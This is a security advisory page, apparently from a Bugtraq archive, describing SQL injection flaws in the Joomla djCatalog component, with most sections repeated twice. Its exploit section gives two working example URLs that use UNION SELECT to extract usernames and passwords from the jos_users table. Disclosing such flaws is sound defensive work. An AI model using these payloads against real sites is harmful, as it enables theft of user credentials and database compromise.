Joomla! djCatalog Component Multiple SQL Injection Vulnerabilities
BID:36412
Info
Joomla! djCatalog Component Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 36412 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 15 2009 12:00AM |
| Updated: | Sep 16 2009 08:00PM |
| Credit: | Chip D3 Bi0s |
| Vulnerable: |
Joomla djCatalog 1.5.x |
| Not Vulnerable: | |
Discussion
Joomla! djCatalog Component Multiple SQL Injection Vulnerabilities
The djCatalog component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The djCatalog component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Joomla! djCatalog Component Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/iindex.php?option=com_djcatalog&view=showItem&id=null+and+1=0+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+jos_users
http://www.example.com/index.php?option=com_djcatalog&view=show&cid=5+and+1=0+union+select+1,password,3,4+from+jos_users
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/iindex.php?option=com_djcatalog&view=showItem&id=null+and+1=0+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+jos_users
http://www.example.com/index.php?option=com_djcatalog&view=show&cid=5+and+1=0+union+select+1,password,3,4+from+jos_users
Solution / Fix
Joomla! djCatalog Component Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Joomla! djCatalog Component Multiple SQL Injection Vulnerabilities
References:
References:
- djCatalog Homepage (djCatalog)